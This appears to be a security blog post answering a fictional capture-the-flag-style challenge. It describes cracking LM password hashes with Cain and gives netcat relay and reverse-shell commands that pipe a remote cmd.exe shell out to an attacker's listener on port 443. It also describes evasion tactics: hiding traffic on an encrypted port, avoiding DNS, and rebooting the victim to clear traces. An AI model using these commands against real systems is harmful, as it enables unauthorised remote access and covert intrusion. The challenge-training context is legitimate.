Security Ripcord

I just found the Ethical Hacker Network site about two months ago.  The thing that drew me to it were the hacking challenges written by Ed Skoudis and friends.  I decided to cut my teeth on the most recent version of the Skillz Challenge which Ed titled, "A Christmas (Hacking) Story. "  The following is my submission to this challenge.  The due time and date were midnight 12/22 so I am not giving anything away here.  Wish me luck.  If you see anything that I missed please post it in the comments.

---

1) What is interesting about the files that Ralphie could see on the lamp server?

There are several interesting things about the files and their descriptions.  First let us address the files themselves.  

• The first file "chimney" is what is known as a named pipe or a FIFO (First In, First Out).  It is referred to as a FIFO because anything that is written to the file is output in the same order.  This type of file is used "to allow totally unrelated programs to communicate with each other." (Source: http://www2.linuxjournal.com/article/2156) 
• The second file "nc" is the Netcat program.  "Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol."  (Source: http://netcat.sourceforge.net/)  This file can be used to connect to services on the local system, to services on other systems within the local network, or to services on systems outside of the network.

Besides the files themselves the next interesting thing is the permissions they have been assigned.  The reason that any user is able to execute the program is because the nc file has been given the "read" and "execute" permissions for the owner, group, and world.  The reason that any user is able to interact with the "chimney" file is because the "read" and "write" permissions have been set for the owner, group, and world. 

2) What is the significance of the Annie cyphertext?

When trying to decipher a code the first thing to look for is a common thread in the evidence.  The first thing that stands out is that all the lines contain 32 characters.  The next thing that stands out is the fact that all of the last 16 characters are similar (AAD3B435B51404EE).  A quick Google search for these characters finds an interesting post from the Openwall John the Ripper mailing list.  "John is only checking the second half of the LM hash for the value of AAD3B435B51404EE to deduce that the password is no more than 7 characters long." (Source: http://www.openwall.com/lists/john-users/2005/05/23/10)  Each line is apparently a password converted by the LM hash algorithm.  

A program that has been developed which will discover the values of LM hashes is "Cain and Abel" by Oxid.it (Source: http://www.oxid.it/cain.html).  It is the "Cain" portion of the program that will accept a list of LM hashes for decryption.  In order to input the LM hashes to the program they must be in a formatted text file.  A format that "Cain" understands is the L0phtCrack version 2.x format.  Finding a good example of this file format on the Internet proved to be a challenge.  Perhaps the easiest and fastest way to determine the file format is to have "Cain" import the hashes from the local system and then export them to a file.  To do this, perform the following steps:

• On a Windows system where you have approval to work, start "Cain".
• Selected the "Cracker" tab.
• In the left box highlight "LM & NTLM Hashes".
• Click the "+" button.
• Select the "Import Hashes from local system" radio button then click the "Next" button. 
• "Cain" will be populated with the accounts from the local system.
• NOTE:  This does not reveal the password for the local account unless a cracking attack is initiated and successful.
• Right click on an account and select "Export".
• Save the file to a special directory with the type "L0phtCrack 2.x file (*.lc)".
• Each line within the file is a colon delimited field
• The first field is the account name
• Not sure what the second field is except that it possibly indicates the delimiter used for the next field.
• Password - LM Hash and NT Hash separated by a colon (Source: http://www.morehouse.org/hin/l0pht/lophtcrackfaq.htm)

Now that the file format has been determined the hashes provided by Annie can be put into the same format. 

• Change the account name field so that each line is numbered 1 through 12. 
• Substitute the first part of the password field with the provided LM Hash. 
• Leave the second part of the password field blank but DO include the colon at the end of the line.  

After the new password file has been created, delete the local accounts, and import the updated file in the same manner as before except this time select "Import Hashes from a text file" when prompted.  

"Cain" is capable of using a Brute Force attack to decrypt the LM hashes.  Select all of the accounts, right click, and select "Brute-Force Attack -> LM Hashes".  To save time change the default character set to only include the alphabet then click the "Start" button.   Once the attack is initiated "Cain" immediately decrypts 10 of the hashes and then informs us that it till take an additional 22 minutes to solve the rest.  While the Brute-Force attack is running a dictionary work list can be downloaded from any number of websites.  One example is from the Packet Storm site, specifically: http://packetstormsecurity.org/Crackers/wordlists/dictionaries/allwords.gz.  Once the file has been saved locally the brute force attack can be stopped.  At this point all but two of the hashes have been cracked: number 6 and 8.  Highlight both of these hashes, right click, and select "Dictionary Attack -> LM Hashes".   Click the "Add" button and select the dictionary file.  As all the cracked hashes to this point have been upper case words only select "Uppercase" and then click the "Start" button.  A few seconds later these last two hashes have been cracked. 

Annie's secret message:  "DRINK MORE OVAL TINE BUY COUNTER HACK RELOADE USE NET CAT RELAY". 

Breaking this message down demonstrates the importance of the message:

DRINK MORE OVAL TINE - translates to "this challenge is going to take a while and you might want some nice sweet chocolate flavored milk before you begin."

BUY COUNTER HACK RELOADE - is merely a blatant marketing plug by some desperate author J.

USE NET CAT RELAY - is a clue on how to pass information from between a Netcat server and client using a FIFO file.  This is important because the files that are available on the LAMP server is the Netcat program ("nc") and a FIFO file ("chimney").   Annie must have some amazing hacking, premonition, or ninja skills. 

3) What command could Ralphie e-mail to the lamp to get access to the command shell on the furnace server from the kid's network to read the Christmas list?  What should Ralphie do on his own laptop for this to work?  Assume that you cannot alter the configuration of the lamp or get any higher privileges on that machine, nor can you reconfigure the firewall.

Ralphie has two options for the command he could send to the LAMP System and obtain a connection to the Netcat Listener on the Furnace System.

• Netcat Relay (preferred option)
• nc -n 10.11.11.11 443 0<chimney | nc -n 10.10.10.10 2222 1>chimney
• Direct Connect
• echo "nc.exe -n 10.11.11.11 -e cmd.exe 443" | nc -n 10.10.10.10 2222

In order for Ralphie's system to accept incoming connections he should start a Netcat Listener on his system with the following command: "nc -l -p 443".  This command must be run BEFORE sending the email to the LAMP System so that the Netcat Listener is ready to accept an incoming connection. 

4) How can Ralphie make the activities you describe above less likely to be detected by his Old Man?

All of the traffic that is exiting the network through the firewall has the potential of being sent through a proxy on the firewall or being monitored.  The only open ports for egressing the network are 80 and 443.  Port 80 would be easy to proxy or monitor because of the clear text traffic that should be flowing through the port.  Port 443 on the other hand is not as easily proxied or monitored because the traffic should be encrypted.  Ralphie can make the assumption that unencrypted traffic egressing the network via port 443 most likely will not be monitored or logged.  The Netcat Listener on Ralphie's laptop should be configured to listen on port 443. 

Ralphie definitely wants to select the Netcat Relay option and avoid the Direct Connect option when connecting his system to the Furnace System.  The reason behind this selection is simple: the Direct Connect option will start a new process on the Furnace System.  It is possible that this action will be listed in the system logs. 

Although each of the Netcat commands uses IP addresses for the hosts they are connecting, there is the potential for extraneous network DNS traffic.  To avoid this each Netcat command run within the Protected Network should utilize the "-n" option which instructs the program to use "numeric-only IP addresses, no DNS." (Source: Netcat cruft). 

Once the connection between Ralphie's system and the Furnace System has been established Ralphie will be presented with a command prompt.  As this activity is highly suspect he will want to limit the amount of data stored on his system that could point to this incident.  As he only wants to know if the "official Red Rider carbine-action, two hundred Gig model laptop" is contained within the "Christmas_gift_list.txt" file he should use the Window's "type" command (i.e "type C:\Christmas_gift_list.txt") which will output the list to the screen.  

The big challenge for Ralphie is the Netcat connection between the LAMP System and the Furnace System.   Once Ralphie has determined the contents of the Christmas_gift_list.txt file he may be tempted to interrupt the Netcat connection between his system and the Furnace System by entering "Cntl-C".  This action will indeed stop the connection between his system and the LAMP System, but it will leave the connection between the LAMP and Furnace Systems "hanging."  This is a bad state for the Furnace System because the Netcat Listener will not be able to accept incoming connections, no other program will be able to bind to port 2222, and the Netcat Listener command will still be listed as a running process.  Additionally, the Netcat client will also be in the process list on the LAMP System. 

Another problem posed by the Netcat Listener on the Furnace System is that it was not started with the "-L" option which would make it persistent.  This means that once the Netcat Listener is shutdown the operating system would notice and start a new instance of the process.  The best case scenario would be to figure out a method to stop the connection between the LAMP and Furnace Systems and then restart the Netcat Listener on the Furnace System.  Normally this would be easily accomplished by using the Windows Management Instrumentation Command-line (WMIC) inherent to Windows 2003.  The following commands would be necessary to identify the Netcat process, stop it, and then restart it.

• wmic process where commandline="nc.exe -l -p 2222 -e cmd.exe" get processid
• wmic process <PID> delete
• wmic process call create "nc.exe -l -p 2222 -e cmd.exe"

Unfortunately there is a problem with this solution.  The WMIC interface cannot be forwarded through the Netcat connection and if Ralphie tries this then his connection to the Furnace System will "freeze" and the connection between the LAMP and Furnace System will remain.  

In order for Ralphie to disconnect the LAMP System from the Furnace System he has to take a drastic step: restart the Furnace System.  To do this Ralphie must enter the following command: "shutdown -r -t 01".  This will restart the Furnace System and hopefully Ralphie's Old Man will figure it was just another Windows glitch.  Should the Old Man happen to be curious though, he may decide to take a quick glance at the event logs.  Fortunately the only evidence concerning the shutdown is located in the System Event Log.  This message reads: "The process winlogon.exe has initiated the restart of FURNACE for the following reason: No title for this reason could be found."  Merry Christmas.

---

Netcat, WMIC, shutdown, oxid.it, Security Ripcord, named pipe, Ed Skoudis

---

Help support my training and travel to security conferences. Get your SANS Training and GIAC Certifications through the Security Ripcord.

---

You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.